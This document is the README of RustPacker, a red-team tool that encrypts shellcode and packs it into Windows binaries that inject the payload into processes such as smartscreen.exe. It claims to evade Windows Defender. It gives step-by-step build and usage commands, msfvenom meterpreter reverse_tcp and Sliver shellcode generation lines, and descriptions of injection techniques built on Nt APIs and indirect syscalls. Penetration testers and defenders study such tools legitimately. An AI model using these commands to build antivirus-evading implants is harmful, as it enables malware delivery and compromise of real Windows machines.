Rustpacker

But, does it bypass Windows Defender ?

Yes! Here with the common metasploit calc exec payload on a Windows 11 host, using the ntCRT template and AES. Last test on 21/12/2023.

Summary

• Summary
• Quick start
  • Podman/Docker setup
• Full documentation
  • Create shellcode
  • Metasploit / MSFvenom
  • Sliver
  • Install Rustpacker
  • Podman/Docker setup
  • Manual install on Kali
  • Use Rustpacker
  • Usage examples
  • Deprecated templates
  • Are you a Rust developer?
  • Todo
  • Credits
  • Legal disclaimer

Quick start

Podman/Docker setup

Consider using Podman instead of Docker for security reasons. From any internet-connected OS with either Podman or Docker installed:

• git clone https://github.com/Nariod/RustPacker.git
• cd RustPacker/
• podman build -t rustpacker -f Dockerfile. This operation may take a while.
• Paste your shellcode file in the shared folder, and create your first binary targeting a running smartscreen process:
• podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/calc.raw -i syscrt -e aes -b exe -t smartscreen.exe
• Retrieve the output binary along with the Rust source files in output_[RANDOM_NAME]: target/x86_64-pc-windows-gnu/release/

For regular use, you can set an alias:

• On Linux host: alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker'
• Then: rustpacker -f shared/calc.raw -i syscrt -e aes -b exe -t smartscreen.exe

Full documentation

Create shellcode

RustPacker is compatible with any raw shellcode.

Metasploit / MSFvenom

You can generate raw MSF shellcode using msfvenom's raw format. Ex:

• msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 EXITFUNC=thread -f raw -o msf.bin

Sliver

You can generate raw Sliver shellcode using Sliver's "--format shellcode". Ex:

• generate --mtls 127.0.0.1:443 --format shellcode --os windows --evasion
• You can use Shikata Ga Nai (SGN) Sliver encoder if prompted. RustPacker templates now use RWX memory regions (not really OPSEC safe), which are required for SGN to work.

Install Rustpacker

Podman/Docker setup

Consider using Podman instead of Docker for security reasons. From any internet-connected OS with either Podman or Docker installed:

• git clone https://github.com/Nariod/RustPacker.git
• cd RustPacker/
• podman build -t rustpacker -f Dockerfile
• Paste your shellcode file in the shared folder
• podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe
• Retrieve the output binary along with the Rust source files in the output_RANDOM_NAME folder in shared

For regular use, you can set an alias:

• On Linux host: alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker'
• Then: rustpacker -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe

Manual install on Kali

Install dependencies:

• sudo apt update && sudo apt upgrade -y
• sudo apt install -y libssl-dev librust-openssl-dev musl-tools mingw-w64 cmake libxml2-dev

Install Rust:

• https://www.rust-lang.org/tools/install
• source $HOME/.cargo/env
• rustup target add x86_64-pc-windows-gnu

Run RustPacker:

• git clone https://github.com/Nariod/RustPacker.git
• cd RustPacker/
• cargo run -- -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe

Use Rustpacker

For now, you can choose from the following templates:

• winCRT, which injects your shellcode in a remote process using the following high-level API calls: OpenProcess, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, CreateRemoteThread. You can supply the target process with -t, defaults to dllhost.exe otherwise. Uses the official Windows crates.
• ntCRT, which injects your shellcode in a remote process using the following low-level API calls: NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx. You can supply the target process with -t, defaults to dllhost.exe otherwise.
• ntAPC, which executes your shellcode in a new process using the following low-levels API calls: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, NtQueueApcThread, NtTestAlert.
• sysCRT, which injects your shellcode in a remote process using indirect syscalls to the following low-level API: NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx. You can supply the target process with -t, defaults to dllhost.exe otherwise. Uses the rust-syscalls project for syscalls.
• winFIBER, which executes your shellcode in a new process using the following high-level API calls: VirtualAlloc, WriteProcessMemory, VirtualProtect, CreateFiber, ConvertThreadToFiber, SwitchToFiber. Uses the official Windows crates. Thanks to Maldev Academy for the execution sequence with fibers !
• ntFIBER, which executes your shellcode in a new process using the following low API calls: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, CreateFiberEx, ConvertThreadToFiber, SwitchToFiber. Uses the official Windows crates. Thanks to Maldev Academy for the execution sequence with fibers !
• sysFIBER, which executes your shellcode in a new process using indirect syscalls the following low API calls: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory. Then, calls CreateFiberEx, ConvertThreadToFiber, SwitchToFiber. Uses the official Windows crates. Thanks to Maldev Academy for the execution sequence with fibers !

All the templates are compatible with either XOR or AES encryption, and can generate an EXE or a DLL file. Templates that inject in remote processes are compatible with the -t option to target the process of your choice.

Usage examples

If you want to pack your Sliver shellcode using the ntCRT template with AES encryption, target notepad.exe, and retrieve an EXE file:

• Generate your raw shellcode from Sliver
• Copy / paste your shellcode file in the shared folder of the Rustpacker project
• Using Podman/Docker without alias: podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/AMAZING_SLIVER.bin -i ntcrt -e aes -b exe -t notepad.exe
• Using Podman/Docker with an alias: rustpacker -f shared/AMAZING_SLIVER.bin -i ntcrt -e aes -b exe -t notepad.exe
• Retrieve the output binary along with the Rust source files in the output_[RANDOM_NAME]: target/x86_64-pc-windows-gnu/release/

If you want to pack your Msfvenom shellcode using the ntAPC template with XOR encryption, and retrieve a DLL file:

• Generate your raw shellcode from Msfvenom
• Copy / paste your shellcode file in the shared folder of the Rustpacker project
• Using Podman/Docker without alias: podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/msf.bin -i ntapc -e xor -b dll
• Using Podman/Docker with an alias: rustpacker -f shared/msf.bin -i ntapc -e xor -b dll
• Retrieve the output binary along with the Rust source files in the output_[RANDOM_NAME]: target/x86_64-pc-windows-gnu/release/

If you want to specify a custom output directory and filename for the resulting binary:

• Add the -o option followed by the desired output directory path.
• Example without alias: podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/msf.bin -i ntapc -e xor -b dll -o shared/my_file.dll
• Example with alias: rustpacker -f shared/msf.bin -i ntapc -e xor -b dll -o shared/my_file.dll

Deprecated templates

These templates are no longer available with RustPacker, but can be found in RustPacker/templates/OLD/:

• ct, which executes your shellcode by spawning a process using the following API calls: VirtualAlloc, VirtualProtect, CreateThread, WaitForSingleObject.
• crt, which injects your shellcode in the dllhost.exe process using the following API calls: OpenProcess, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, CreateRemoteThread.

Are you a Rust developer?

If you have some experience with Rust, you're more than welcome to help ! You can help by:

• Reviewing the code for mistakes / improvements
• Opening issues
• Contacting me on Discord for a more in depth review (nariod#4621)

Todo

• [X] Port createThread Rust template
• [X] Port createRemoteThread Rust template
• [X] Debug binary file to Vec
• [X] Debug compiler
• [X] Packer POC
• [X] Migrate to "std::include_bytes"
• [X] Add xor
• [X] Add AES
• [X] Add Sliver SGN support
• [ ] Refactor code
• [X] Write ntCRT template with Nt APIs
• [X] Rewrite all templates using Nt APIs only
• [X] Build dockerfile
• [X] Strip output binaries
• [ ] Add string encryption option with litcrypt or other
• [X] Add option to choose the target process to inject into
• [ ] Add sandbox evasion option
• [X] Reduce cargo verbosity
• [X] Generate random name for generated binary
• [ ] Add binary signing support
• [X] Port ntCRT to sysCRT with syscalls
• [ ] Port ntAPC to sysAPC with syscalls
• [X] Write detailed doc
• [X] Support both EXE and DLL formats
• [ ] Add semaphore/mutex support to ensure only one instance of the shellcode is running
• [X] Remove the annoying snake case warnings
• [X] Bump Clap from v3 to v4
• [ ] Implement Maldev Academy smart XOR

Credits

• memN0ps for all his work
• The rust-syscalls project
• trickster0 for his OffensiveRust repo
• Rust discord
• StackOverflow
• https://github.com/postrequest/link
• Maldev Academy for the Fibers shellcode execution method
• craiyon for the Rustpacker logo

Legal disclaimer

Usage of anything presented in this repo to attack targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.